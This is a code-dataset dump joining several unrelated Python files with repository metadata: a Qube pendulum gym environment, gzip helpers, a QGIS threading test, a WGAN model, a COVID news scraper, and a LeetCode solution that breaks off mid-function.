Type: Box(4)
Num Observation Min Max
0 Rotary arm angle (theta) -90 deg 90 deg
1 Pendulum angle (alpha) -180 deg 180 deg
2 Cart Velocity -Inf Inf
3 Pole Velocity -Inf Inf
Note: the velocities are limited by the physical system.
Actions:
Type: Real number (1-D Continuous) (voltage applied to motor)
Reward:
r(s_t, a_t) = 1 - (0.8 * abs(alpha) + 0.2 * abs(theta)) / pi
Starting State:
Theta = 0 + noise, alpha = pi + noise
Episode Termination:
When theta is greater than ±90° or after 2048 steps
"""
| 33.375 | 98 | 0.599251 | from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import numpy as np
from gym import spaces
from gym_brt.envs.qube_base_env import QubeBaseEnv
"""
Description:
A pendulum is attached to an un-actuated joint to a horizontal arm,
which is actuated by a rotary motor. The pendulum begins
downwards and the goal is flip the pendulum up and then to keep it from
falling by applying a voltage on the motor which causes a torque on the
horizontal arm.
Source:
This is modified for the Quanser Qube Servo2-USB from the Cart Pole
problem described by Barto, Sutton, and Anderson, and implemented in
OpenAI Gym: https://github.com/openai/gym/blob/master/gym/envs/classic_control/cartpole.py
This description is also modified from the description by the OpenAI
team.
Observation:
Type: Box(4)
Num Observation Min Max
0 Rotary arm angle (theta) -90 deg 90 deg
1 Pendulum angle (alpha) -180 deg 180 deg
2 Cart Velocity -Inf Inf
3 Pole Velocity -Inf Inf
Note: the velocities are limited by the physical system.
Actions:
Type: Real number (1-D Continuous) (voltage applied to motor)
Reward:
r(s_t, a_t) = 1 - (0.8 * abs(alpha) + 0.2 * abs(theta)) / pi
Starting State:
Theta = 0 + noise, alpha = pi + noise
Episode Termination:
When theta is greater than ±90° or after 2048 steps
"""
class QubeSwingupEnv(QubeBaseEnv):
    """Swing-up task: start with the pendulum hanging down; the reward grows
    as the pendulum approaches upright with the arm near the target angle."""

    def _reward(self):
        """Dense reward in [0, 1], weighted 80% pendulum / 20% arm error."""
        pendulum_cost = 0.8 * np.abs(self._alpha)
        arm_cost = 0.2 * np.abs(self._target_angle - self._theta)
        raw = 1 - (pendulum_cost + arm_cost) / np.pi
        # Clip for the follow env case
        return max(raw, 0)

    def _isdone(self):
        """Episode ends after the step budget or when the arm exceeds +/-90 deg."""
        out_of_steps = self._episode_steps >= self._max_episode_steps
        arm_out_of_range = abs(self._theta) > (90 * np.pi / 180)
        return out_of_steps or arm_out_of_range

    def reset(self):
        """Reset the hardware, then move the pendulum to the down position."""
        super(QubeSwingupEnv, self).reset()
        return self._reset_down()
class QubeSwingupSparseEnv(QubeSwingupEnv):
    """Sparse variant: reward is 1 only when both angles are within 1 degree."""

    def _reward(self):
        tolerance = 1 * np.pi / 180
        on_target = np.abs(self._alpha) < tolerance and np.abs(self._theta) < tolerance
        return 1 if on_target else 0
class QubeSwingupFollowEnv(QubeSwingupEnv):
    """Swing-up with a randomly moving target angle appended to the observation."""

    def __init__(self, **kwargs):
        super(QubeSwingupFollowEnv, self).__init__(**kwargs)
        # Five observations: theta, alpha, their velocities, and the target
        # angle (bounded to +/-80 degrees).
        bound = np.asarray(
            [np.pi / 2, np.pi, np.inf, np.inf, 80 * (np.pi / 180)], dtype=np.float64
        )
        self.observation_space = spaces.Box(-bound, bound)

    def _get_state(self):
        """State vector with the current target angle as the fifth entry."""
        return np.array(
            [
                self._theta,
                self._alpha,
                self._theta_dot,
                self._alpha_dot,
                self._target_angle,
            ],
            dtype=np.float64,
        )

    def _next_target_angle(self):
        # Update the target angle twice a second on average at random intervals
        if np.random.randint(1, self._frequency / 2) == 1:
            max_angle = 80 * (np.pi / 180)  # 80 degrees
            return np.random.uniform(-max_angle, max_angle)
        return self._target_angle
class QubeSwingupFollowSparseEnv(QubeSwingupFollowEnv):
    """Follow variant with the sparse (within one degree) reward."""

    def _reward(self):
        tolerance = 1 * np.pi / 180
        on_target = np.abs(self._alpha) < tolerance and np.abs(self._theta) < tolerance
        return 1 if on_target else 0
| 1,709 | 91 | 304 |
be4b0872f71e5df9568ca4862fab6509d237b0e8 | 835 | py | Python | CossioUtils/io.py | cossio/CossioUtils | 0bf5dbfbcdd67fd1a6cbe99d5679e420055c590a | [
"MIT"
] | 1 | 2019-04-07T23:36:44.000Z | 2019-04-07T23:36:44.000Z | CossioUtils/io.py | cossio/CossioUtils | 0bf5dbfbcdd67fd1a6cbe99d5679e420055c590a | [
"MIT"
] | null | null | null | CossioUtils/io.py | cossio/CossioUtils | 0bf5dbfbcdd67fd1a6cbe99d5679e420055c590a | [
"MIT"
] | null | null | null | """
Input/output with the CHO_K1 model files.
"""
import os
import subprocess
def gunzip(path, keep=True):
    """
    Check if file is gzipped, in which case extract it (replacing output).

    :param path: path of the decompressed file (the archive is ``path + '.gz'``)
    :param keep: if True, keep the ``.gz`` archive after extraction
    :raises FileNotFoundError: if neither ``path`` nor ``path + '.gz'`` exists
    :return: the original (decompressed) path
    """
    if os.path.exists(path + '.gz'):
        if keep:
            subprocess.call(['gunzip', '--force', '--keep', path + '.gz'])
        else:
            subprocess.call(['gunzip', '--force', path + '.gz'])
    elif not os.path.exists(path):
        # Include the offending path so the error is actionable.
        raise FileNotFoundError(path)
    return path
def gzip(path, keep=True):
    """
    Compress file (replacing output).

    :param path: file to compress into ``path + '.gz'``
    :param keep: if True, keep the uncompressed file after compression
    :raises FileNotFoundError: if ``path`` does not exist
    :return: the original (uncompressed) path
    """
    if os.path.exists(path):
        if keep:
            subprocess.call(['gzip', '--force', '--keep', path])
        else:
            subprocess.call(['gzip', '--force', path])
    else:
        # Include the offending path so the error is actionable.
        raise FileNotFoundError(path)
    return path
| 24.558824 | 75 | 0.565269 | """
Input/output with the CHO_K1 model files.
"""
import os
import subprocess
def gunzip(path, keep=True):
    """
    Check if file is gzipped, in which case extract it (replacing output).

    :param path: path of the decompressed file (the archive is ``path + '.gz'``)
    :param keep: if True, keep the ``.gz`` archive after extraction
    :raises FileNotFoundError: if neither ``path`` nor ``path + '.gz'`` exists
    :return: the original (decompressed) path
    """
    if os.path.exists(path + '.gz'):
        if keep:
            subprocess.call(['gunzip', '--force', '--keep', path + '.gz'])
        else:
            subprocess.call(['gunzip', '--force', path + '.gz'])
    elif not os.path.exists(path):
        # Include the offending path so the error is actionable.
        raise FileNotFoundError(path)
    return path
def gzip(path, keep=True):
    """
    Compress file (replacing output).

    :param path: file to compress into ``path + '.gz'``
    :param keep: if True, keep the uncompressed file after compression
    :raises FileNotFoundError: if ``path`` does not exist
    :return: the original (uncompressed) path
    """
    if os.path.exists(path):
        if keep:
            subprocess.call(['gzip', '--force', '--keep', path])
        else:
            subprocess.call(['gzip', '--force', path])
    else:
        # Include the offending path so the error is actionable.
        raise FileNotFoundError(path)
    return path
| 0 | 0 | 0 |
feb907e46ae267e25885459ab49489e5ba766bf5 | 2,834 | py | Python | tests/integration/thread_support/test_run.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | tests/integration/thread_support/test_run.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | tests/integration/thread_support/test_run.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
| 32.204545 | 80 | 0.680663 | # -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
import threading
from time import sleep
from unittest import TestCase, SkipTest
from unittest.mock import MagicMock
from PyQt5.QtCore import QCoreApplication, QEventLoop
from qgis_plutil.thread_support.gui_side import GuiSide
from qgis_plutil.thread_support.messages.base import TsMessage
from qgis_plutil.thread_support.thread_side import ThreadSide
logger = logging.getLogger('tests.plutil.thread_support')
class WorkerThread(ThreadSide, threading.Thread):
    """Thread-side endpoint used by the test: announces itself, then idles
    until asked to terminate."""

    def __init__(self, *args, **kwargs):
        super(WorkerThread, self).__init__(name="WorkerThread", *args, **kwargs)
        # Set this to terminate the thread.
        self.stop = threading.Event()

    def run(self):
        self.thread_side_started()
        # Block until stop is set. The original `while not self.stop.is_set():
        # pass` busy-waited, pinning a CPU core for the life of the test.
        self.stop.wait()
class AMessage(TsMessage):
    """Test message that counts how many times each side's hook has run."""

    def __init__(self, *args, **kwargs):
        super(AMessage, self).__init__(*args, **kwargs)
        self.on_thread_side_called = 0
        self.on_on_gui_side = 0

    def on_thread_side(self):
        """Executed just before the messages leaves the thread side."""
        self.on_thread_side_called += 1

    def on_gui_side(self):
        """Executed when the message has reached GUI side."""
        self.on_on_gui_side += 1
class TestTestee(TestCase):
    """Integration test: GuiSide receives messages sent from a ThreadSide thread."""

    def setUp(self):
        # A Qt core application is required so GuiSide can pump its event queue.
        self.plugin = MagicMock()
        self.app = QCoreApplication([])
        self.thread = WorkerThread(self.plugin)
        self.testee = GuiSide()
        self.testee.tie(self.thread)
        self.thread.start()
        # Give the worker thread time to start before draining the queue.
        self.testee.receiver()

    def tearDown(self):
        # Ask the worker loop to exit, then release the GUI side and the app.
        self.thread.stop.set()
        self.testee = None
        self.app.exit()

    def test_init(self):
        """Two messages cross from the thread side and trigger their hooks."""
        logger.debug("Run GuiSide/ThreadSide test starting")
        self.app.processEvents(QEventLoop.AllEvents, 1)
        sleep(0.2)
        self.assertEqual(self.thread.state, self.thread.STATE_CONNECTED)
        msg = AMessage(self.plugin, self.thread)
        self.assertIsNotNone(msg.message_id)
        self.thread.send_to_gui(msg)
        # Let the message cross the thread boundary, then process Qt events.
        sleep(0.2)
        self.testee.receiver()
        self.app.processEvents(QEventLoop.AllEvents, 1)
        # NOTE(review): both assertions check on_thread_side_called; the
        # second was presumably meant to check on_on_gui_side -- confirm.
        self.assertEqual(msg.on_thread_side_called, 1)
        self.assertEqual(msg.on_thread_side_called, 1)
        msg = AMessage(self.plugin, self.thread)
        self.assertIsNotNone(msg.message_id)
        self.thread.send_to_gui(msg)
        sleep(0.2)
        self.testee.receiver()
        self.app.processEvents(QEventLoop.AllEvents, 1)
        # NOTE(review): same duplicated assertion as above -- confirm intent.
        self.assertEqual(msg.on_thread_side_called, 1)
        self.assertEqual(msg.on_thread_side_called, 1)
        logger.debug("Run GuiSide/ThreadSide test ends")
| 1,707 | 384 | 202 |
122e24f97103d87047596f69b219cb89b9aa8ea0 | 3,296 | py | Python | examples/recurrentwithtestbench.py | Bhaskers-Blu-Org1/complex-linear-network-analyzer | b336a4fca1222a4f284bb39c6c3e6bec402f5efa | [
"Apache-2.0"
] | 6 | 2020-01-20T10:22:49.000Z | 2020-04-24T06:53:51.000Z | examples/recurrentwithtestbench.py | Bhaskers-Blu-Org1/complex-linear-network-analyzer | b336a4fca1222a4f284bb39c6c3e6bec402f5efa | [
"Apache-2.0"
] | 7 | 2020-01-28T18:59:00.000Z | 2020-02-24T14:42:07.000Z | examples/recurrentwithtestbench.py | IBM/complex-linear-network-analyzer | b336a4fca1222a4f284bb39c6c3e6bec402f5efa | [
"Apache-2.0"
] | 5 | 2020-01-29T04:05:49.000Z | 2020-06-29T15:05:15.000Z | # +-----------------------------------------------------------------------------+
# | Copyright 2019-2020 IBM Corp. All Rights Reserved. |
# | |
# | Licensed under the Apache License, Version 2.0 (the "License"); |
# | you may not use this file except in compliance with the License. |
# | You may obtain a copy of the License at |
# | |
# | http://www.apache.org/licenses/LICENSE-2.0 |
# | |
# | Unless required by applicable law or agreed to in writing, software |
# | distributed under the License is distributed on an "AS IS" BASIS, |
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
# | See the License for the specific language governing permissions and |
# | limitations under the License. |
# +-----------------------------------------------------------------------------+
# | Authors: Lorenz K. Mueller, Pascal Stark |
# +-----------------------------------------------------------------------------+
""" Creates a very simple recurrent network with a testbench.
This is the example used in the basic usage guide.
The network topology is as follows:
A -> B
^ v
D <- C
A testbench is used to inject time varying signals at node A and B.
"""
from colna.analyticnetwork import Network, Edge, Testbench
import numpy as np
import matplotlib.pyplot as plt
### Create the Network and add the nodes
net = Network()
net.add_node(name='a')
net.add_node(name='b')
net.add_node(name='c')
net.add_node(name='d')
# Connect the nodes into a feedback ring a -> b -> c -> d -> a; every edge
# applies a phase shift, an amplitude attenuation and a propagation delay.
net.add_edge(Edge(start='a',end='b',phase=1,attenuation=0.8,delay=1))
net.add_edge(Edge(start='b',end='c',phase=2,attenuation=0.7,delay=2))
net.add_edge(Edge(start='c',end='d',phase=3,attenuation=0.8,delay=1))
net.add_edge(Edge(start='d',end='a',phase=-1,attenuation=0.9,delay=0.5))
# Render the topology to an image for visual inspection.
net.visualize(path='./visualizations/recurrent_with_testbench')

### Create a testbench
tb = Testbench(network=net, timestep=0.1) # Timestep should be factor of all delays
x_in_a = np.sin(np.linspace(0,15,500))+1.5 # create the input signal (Dimension N)
t_in = np.linspace(0, 10, num=501) # create the input time vector (Dimension N+1)
# Inject the time-varying signal at node 'a'.
tb.add_input_sequence(node_name='a',x=x_in_a,t=t_in)

# add output nodes to testbench (nodes at which output signal should be recorded)
tb.add_output_node('c')
tb.add_output_node('d')

# evaluate the network (through the testbench)
tb.evaluate_network(amplitude_cutoff=1e-6)

# Calculate the output signal at the output nodes
tb.calculate_output(n_threads=8) # uses multithreading with at most 8 threads
t, x = tb.t_out.transpose(), tb.x_out.transpose()

### Plot the signals
plt.plot(tb.input_t[0][:-1], np.abs(tb.input_x[0][:-1]), 'o') # Input signal
plt.plot(t, np.abs(x), 'x') # Output signal
plt.xlabel('Time')
plt.ylabel('|x|')
plt.legend(['Input', 'Output C', 'Output D'], loc='lower left')
plt.grid()
# plt.savefig('basic_feedforward_tb_output.svg')
plt.show()
| 41.721519 | 83 | 0.567658 | # +-----------------------------------------------------------------------------+
# | Copyright 2019-2020 IBM Corp. All Rights Reserved. |
# | |
# | Licensed under the Apache License, Version 2.0 (the "License"); |
# | you may not use this file except in compliance with the License. |
# | You may obtain a copy of the License at |
# | |
# | http://www.apache.org/licenses/LICENSE-2.0 |
# | |
# | Unless required by applicable law or agreed to in writing, software |
# | distributed under the License is distributed on an "AS IS" BASIS, |
# | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. |
# | See the License for the specific language governing permissions and |
# | limitations under the License. |
# +-----------------------------------------------------------------------------+
# | Authors: Lorenz K. Mueller, Pascal Stark |
# +-----------------------------------------------------------------------------+
""" Creates a very simple recurrent network with a testbench.
This is the example used in the basic usage guide.
The network topology is as follows:
A -> B
^ v
D <- C
A testbench is used to inject time varying signals at node A and B.
"""
from colna.analyticnetwork import Network, Edge, Testbench
import numpy as np
import matplotlib.pyplot as plt
### Create the Network and add the nodes
net = Network()
net.add_node(name='a')
net.add_node(name='b')
net.add_node(name='c')
net.add_node(name='d')
# Connect the nodes into a feedback ring a -> b -> c -> d -> a; every edge
# applies a phase shift, an amplitude attenuation and a propagation delay.
net.add_edge(Edge(start='a',end='b',phase=1,attenuation=0.8,delay=1))
net.add_edge(Edge(start='b',end='c',phase=2,attenuation=0.7,delay=2))
net.add_edge(Edge(start='c',end='d',phase=3,attenuation=0.8,delay=1))
net.add_edge(Edge(start='d',end='a',phase=-1,attenuation=0.9,delay=0.5))
# Render the topology to an image for visual inspection.
net.visualize(path='./visualizations/recurrent_with_testbench')

### Create a testbench
tb = Testbench(network=net, timestep=0.1) # Timestep should be factor of all delays
x_in_a = np.sin(np.linspace(0,15,500))+1.5 # create the input signal (Dimension N)
t_in = np.linspace(0, 10, num=501) # create the input time vector (Dimension N+1)
# Inject the time-varying signal at node 'a'.
tb.add_input_sequence(node_name='a',x=x_in_a,t=t_in)

# add output nodes to testbench (nodes at which output signal should be recorded)
tb.add_output_node('c')
tb.add_output_node('d')

# evaluate the network (through the testbench)
tb.evaluate_network(amplitude_cutoff=1e-6)

# Calculate the output signal at the output nodes
tb.calculate_output(n_threads=8) # uses multithreading with at most 8 threads
t, x = tb.t_out.transpose(), tb.x_out.transpose()

### Plot the signals
plt.plot(tb.input_t[0][:-1], np.abs(tb.input_x[0][:-1]), 'o') # Input signal
plt.plot(t, np.abs(x), 'x') # Output signal
plt.xlabel('Time')
plt.ylabel('|x|')
plt.legend(['Input', 'Output C', 'Output D'], loc='lower left')
plt.grid()
# plt.savefig('basic_feedforward_tb_output.svg')
plt.show()
| 0 | 0 | 0 |
990c196f5e7a804c80194cfa856bf71876334ed4 | 83 | py | Python | wrktoolbox/results/importers/__init__.py | kishorekumar-kk/wrktoolbox | 20ba73a6dc04c4c1436ed6e3d37095246b3c7392 | [
"MIT"
] | 3 | 2020-04-08T08:54:26.000Z | 2021-07-27T16:29:39.000Z | wrktoolbox/results/importers/__init__.py | kishorekumar-kk/wrktoolbox | 20ba73a6dc04c4c1436ed6e3d37095246b3c7392 | [
"MIT"
] | 2 | 2019-07-08T13:19:41.000Z | 2021-01-24T21:06:06.000Z | wrktoolbox/results/importers/__init__.py | kishorekumar-kk/wrktoolbox | 20ba73a6dc04c4c1436ed6e3d37095246b3c7392 | [
"MIT"
] | 2 | 2020-11-03T07:54:53.000Z | 2021-01-22T11:59:05.000Z | from .fs import FileSystemResultsImporter, BinResultsImporter, JsonResultsImporter
| 41.5 | 82 | 0.891566 | from .fs import FileSystemResultsImporter, BinResultsImporter, JsonResultsImporter
| 0 | 0 | 0 |
b903f800d1282748870cd47b182ead99beff34b4 | 5,558 | py | Python | awesome_gans/wgan/model.py | StevenJokess/Awesome-GANs | b78410e072ec3c0c39a4dac853dea7c219817c65 | [
"MIT"
] | 739 | 2017-05-28T18:07:38.000Z | 2022-03-28T23:57:42.000Z | awesome_gans/wgan/model.py | StevenJokess/Awesome-GANs | b78410e072ec3c0c39a4dac853dea7c219817c65 | [
"MIT"
] | 25 | 2018-01-18T07:09:07.000Z | 2021-08-25T14:11:09.000Z | awesome_gans/wgan/model.py | StevenJokess/Awesome-GANs | b78410e072ec3c0c39a4dac853dea7c219817c65 | [
"MIT"
] | 185 | 2017-07-15T05:18:10.000Z | 2022-02-17T10:17:02.000Z | import os
import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
Conv2D,
Conv2DTranspose,
Dense,
Flatten,
Input,
Layer,
LeakyReLU,
ReLU,
Reshape,
)
from tensorflow.keras.models import Model
from tqdm import tqdm
from awesome_gans.losses import discriminator_loss, generator_loss, discriminator_wgan_loss, generator_wgan_loss
from awesome_gans.optimizers import build_optimizer
from awesome_gans.utils import merge_images, save_image
| 34.308642 | 112 | 0.622526 | import os
import tensorflow as tf
from tensorflow.keras.layers import (
BatchNormalization,
Conv2D,
Conv2DTranspose,
Dense,
Flatten,
Input,
Layer,
LeakyReLU,
ReLU,
Reshape,
)
from tensorflow.keras.models import Model
from tqdm import tqdm
from awesome_gans.losses import discriminator_loss, generator_loss, discriminator_wgan_loss, generator_wgan_loss
from awesome_gans.optimizers import build_optimizer
from awesome_gans.utils import merge_images, save_image
class WGAN:
    """Wasserstein GAN (weight-clipping variant).

    Builds a DCGAN-style critic (``discriminator``) and generator, trains
    the critic ``n_critics`` times per generator update, and clips the
    critic's weights to ``[-grad_clip, grad_clip]`` after every critic step.
    """

    def __init__(self, config):
        """Read hyper-parameters from ``config``, build models and optimizers."""
        self.config = config

        # Training schedule.
        self.bs: int = self.config.bs
        self.n_samples: int = self.config.n_samples
        self.epochs: int = self.config.epochs

        self.d_loss = self.config.d_loss
        self.g_loss = self.config.g_loss

        # Architecture sizes.
        self.n_feats: int = self.config.n_feats
        self.width: int = self.config.width
        self.height: int = self.config.height
        self.n_channels: int = self.config.n_channels
        self.z_dims: int = self.config.z_dims
        # WGAN specifics: critic steps per generator step and the clip bound.
        self.n_critics: int = self.config.n_critics
        self.grad_clip: float = self.config.grad_clip

        self.model_path: str = self.config.model_path
        self.output_path: str = self.config.output_path

        self.verbose: bool = self.config.verbose

        self.discriminator: tf.keras.Model = self.build_discriminator()
        self.generator: tf.keras.Model = self.build_generator()

        self.d_opt: tf.keras.optimizers = build_optimizer(config, config.d_opt)
        self.g_opt: tf.keras.optimizers = build_optimizer(config, config.g_opt)

        # Checkpoint both networks and both optimizer states together.
        # NOTE: the misspelled key 'discriminator_optimzer' is kept on
        # purpose -- renaming it would invalidate previously saved checkpoints.
        self.checkpoint = tf.train.Checkpoint(
            discriminator=self.discriminator,
            discriminator_optimzer=self.d_opt,
            generator=self.generator,
            generator_optimizer=self.g_opt,
        )

        if self.verbose:
            self.discriminator.summary()
            self.generator.summary()

    def build_discriminator(self) -> tf.keras.Model:
        """Critic network: strided convs halving the spatial size each stage.

        The output is a single linear unit -- no activation, since the WGAN
        critic must produce an unbounded score.
        """
        inputs = Input((self.width, self.height, self.n_channels))

        x = Conv2D(self.n_feats, kernel_size=5, strides=2, padding='same')(inputs)
        x = LeakyReLU(alpha=0.2)(x)

        for i in range(3):
            x = Conv2D(self.n_feats * (2 ** (i + 1)), kernel_size=5, strides=2, padding='same')(x)
            x = BatchNormalization()(x)
            x = LeakyReLU(alpha=0.2)(x)

        x = Flatten()(x)
        x = Dense(1)(x)

        return Model(inputs, x, name='discriminator')

    def build_generator(self) -> tf.keras.Model:
        """Generator: dense projection to 4x4, three upsampling stages, tanh output."""
        inputs = Input((self.z_dims,))

        x = Dense(4 * 4 * 4 * self.z_dims)(inputs)
        x = BatchNormalization()(x)
        x = ReLU()(x)
        x = Reshape((4, 4, 4 * self.z_dims))(x)

        for i in range(3):
            x = Conv2DTranspose(self.z_dims * 4 // (2 ** i), kernel_size=5, strides=2, padding='same')(x)
            x = BatchNormalization()(x)
            x = ReLU()(x)

        x = Conv2DTranspose(self.n_channels, kernel_size=5, strides=1, padding='same')(x)
        # Bug fix: the original `Layer('tanh')(x)` constructed a no-op base
        # Layer (the string landed in its `trainable` argument), so the tanh
        # was never applied and the generator output was unbounded. Use an
        # Activation layer to actually squash the output to [-1, 1].
        x = tf.keras.layers.Activation('tanh')(x)

        return Model(inputs, x, name='generator')

    @tf.function
    def train_discriminator(self, x: tf.Tensor):
        """One critic step on a real batch ``x``; returns the critic loss."""
        z = tf.random.uniform((self.bs, self.z_dims))

        with tf.GradientTape() as gt:
            x_fake = self.generator(z, training=True)
            d_fake = self.discriminator(x_fake, training=True)
            d_real = self.discriminator(x, training=True)
            d_loss = discriminator_wgan_loss(d_real, d_fake)

        gradients = gt.gradient(d_loss, self.discriminator.trainable_variables)
        self.d_opt.apply_gradients(zip(gradients, self.discriminator.trainable_variables))

        # Weight clipping enforces WGAN's (crude) Lipschitz constraint.
        for var in self.discriminator.trainable_variables:
            var.assign(tf.clip_by_value(var, -self.grad_clip, self.grad_clip))

        return d_loss

    @tf.function
    def train_generator(self):
        """One generator step on a fresh latent batch; returns the generator loss."""
        z = tf.random.uniform((self.bs, self.z_dims))

        with tf.GradientTape() as gt:
            x_fake = self.generator(z, training=True)
            d_fake = self.discriminator(x_fake, training=True)
            g_loss = generator_wgan_loss(d_fake)

        gradients = gt.gradient(g_loss, self.generator.trainable_variables)
        self.g_opt.apply_gradients(zip(gradients, self.generator.trainable_variables))

        return g_loss

    def load(self) -> int:
        """Stub: always start from epoch 0 (checkpoint restore not implemented)."""
        return 0

    def train(self, dataset: tf.data.Dataset):
        """Main loop: ``n_critics`` critic steps, then one generator step per batch.

        After each epoch a sample grid is written to ``output_path`` and a
        checkpoint is saved under ``model_path``.
        """
        start_epoch: int = self.load()

        # Fixed latent batch so sample grids are comparable across epochs.
        z_samples = tf.random.uniform((self.n_samples, self.z_dims))

        for epoch in range(start_epoch, self.epochs):
            loader = tqdm(dataset, desc=f'[*] Epoch {epoch} / {self.epochs}')
            for n_iter, batch in enumerate(loader):
                for _ in range(self.n_critics):
                    d_loss = self.train_discriminator(batch)
                g_loss = self.train_generator()

                loader.set_postfix(
                    d_loss=f'{d_loss:.5f}',
                    g_loss=f'{g_loss:.5f}',
                )

            # saving the generated samples
            samples = self.generate_samples(z_samples)
            samples = merge_images(samples, n_rows=int(self.n_samples ** 0.5))
            save_image(samples, os.path.join(self.output_path, f'{epoch}.png'))

            # saving the models & optimizers
            self.checkpoint.save(file_prefix=os.path.join(self.model_path, f'{epoch}'))

    @tf.function
    def generate_samples(self, z: tf.Tensor):
        """Run the generator in inference mode on latent batch ``z``."""
        return self.generator(z, training=False)
| 4,776 | 256 | 23 |
6b4d6d847ba58abac6e0ef39bfeb1d6a44cda852 | 1,002 | py | Python | src/utils/fetch_timeline.py | CS-UIT-AI-CLUB/covid-stat | 5e1ba8049cec2d0917e736cc1c52e082669407c7 | [
"MIT"
] | null | null | null | src/utils/fetch_timeline.py | CS-UIT-AI-CLUB/covid-stat | 5e1ba8049cec2d0917e736cc1c52e082669407c7 | [
"MIT"
] | null | null | null | src/utils/fetch_timeline.py | CS-UIT-AI-CLUB/covid-stat | 5e1ba8049cec2d0917e736cc1c52e082669407c7 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import datetime
import unicodedata
def fetch_timeline(response):
'''
Fetch latest COVID-19 news.
Input: HTML content fetched from the web.
Return (
unix_timestamp,
list of paragraphs (unicode NFKC normalized)
)
'''
soup = BeautifulSoup(response, features="html.parser")
# Fetch latest news
timeline = soup.find("div", {"class": "timeline-detail"})
date = timeline.find("div", {"class": "timeline-head"}).text.strip()
content = timeline.find("div", {"class": "timeline-content"})
# Convert from string to datetime
date = datetime.datetime.strptime(date, '%H:%M %d/%m/%Y')
# Convert from UTF+7 to UTC+0
date = date - datetime.timedelta(hours=7)
timestamp = date.timestamp()
# Normalize content
content = unicodedata.normalize('NFKC', content.text).strip()
# Split lines
lines = content.splitlines()
return timestamp, lines | 31.3125 | 73 | 0.628743 | from bs4 import BeautifulSoup
import datetime
import unicodedata
def fetch_timeline(response):
'''
Fetch latest COVID-19 news.
Input: HTML content fetched from the web.
Return (
unix_timestamp,
list of paragraphs (unicode NFKC normalized)
)
'''
soup = BeautifulSoup(response, features="html.parser")
# Fetch latest news
timeline = soup.find("div", {"class": "timeline-detail"})
date = timeline.find("div", {"class": "timeline-head"}).text.strip()
content = timeline.find("div", {"class": "timeline-content"})
# Convert from string to datetime
date = datetime.datetime.strptime(date, '%H:%M %d/%m/%Y')
# Convert from UTF+7 to UTC+0
date = date - datetime.timedelta(hours=7)
timestamp = date.timestamp()
# Normalize content
content = unicodedata.normalize('NFKC', content.text).strip()
# Split lines
lines = content.splitlines()
return timestamp, lines | 0 | 0 | 0 |
b2ebe7a92be3a8e73bbfdd123e14e4e6615123d0 | 430 | py | Python | setup.py | horns-g/DataPipelines | 07f07af56c142b1ecb58da802aa70b12fd6faf2b | [
"MIT"
] | null | null | null | setup.py | horns-g/DataPipelines | 07f07af56c142b1ecb58da802aa70b12fd6faf2b | [
"MIT"
] | 2 | 2021-02-08T20:28:45.000Z | 2021-06-01T23:29:35.000Z | setup.py | IprelProgetti/DataPipelines | 07f07af56c142b1ecb58da802aa70b12fd6faf2b | [
"MIT"
] | null | null | null | import setuptools
REQUIRED_PACKAGES = []
PACKAGE_NAME = 'my_alice_pipeline'
PACKAGE_VERSION = '1.0.0'
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description='Alice in Wonderland pipeline',
url="https://github.com/horns-g/DataPipelines",
author="Gabriele Corni",
author_email="gabriele_corni@iprel.it",
install_requires=REQUIRED_PACKAGES,
packages=setuptools.find_packages(),
)
| 25.294118 | 51 | 0.746512 | import setuptools
REQUIRED_PACKAGES = []
PACKAGE_NAME = 'my_alice_pipeline'
PACKAGE_VERSION = '1.0.0'
setuptools.setup(
name=PACKAGE_NAME,
version=PACKAGE_VERSION,
description='Alice in Wonderland pipeline',
url="https://github.com/horns-g/DataPipelines",
author="Gabriele Corni",
author_email="gabriele_corni@iprel.it",
install_requires=REQUIRED_PACKAGES,
packages=setuptools.find_packages(),
)
| 0 | 0 | 0 |
b503bd8d3bcd6f89278b0832a76f1d728ce42751 | 936 | py | Python | src/tree/1026.maximum-difference-between-node-and-ancestor/maximum-difference-between-node-and-ancestor.py | lyphui/Just-Code | e0c3c3ecb67cb805080ff686e88522b2bffe7741 | [
"MIT"
] | 782 | 2019-11-19T08:20:49.000Z | 2022-03-25T06:59:09.000Z | src/1026.maximum-difference-between-node-and-ancestor/maximum-difference-between-node-and-ancestor.py | Heitao5200/Just-Code | 5bb3ee485a103418e693b7ec8e26dc84f3691c79 | [
"MIT"
] | 1 | 2021-03-04T12:21:01.000Z | 2021-03-05T01:23:54.000Z | src/1026.maximum-difference-between-node-and-ancestor/maximum-difference-between-node-and-ancestor.py | Heitao5200/Just-Code | 5bb3ee485a103418e693b7ec8e26dc84f3691c79 | [
"MIT"
] | 155 | 2019-11-20T08:20:42.000Z | 2022-03-19T07:28:09.000Z | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None | 40.695652 | 113 | 0.619658 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
def maxAncestorDiff(self, root: TreeNode) -> int:
maxLeft = self.maxHelper(root.left, root.val, root.val)
maxRight = self.maxHelper(root.right, root.val, root.val)
return max(maxLeft, maxRight)
def maxHelper(self, root, minVal, maxVal):
if not root:
return abs(maxVal - minVal)
if root.val < minVal:
return max(self.maxHelper(root.left, root.val, maxVal), self.maxHelper(root.right, root.val, maxVal))
elif root.val > maxVal:
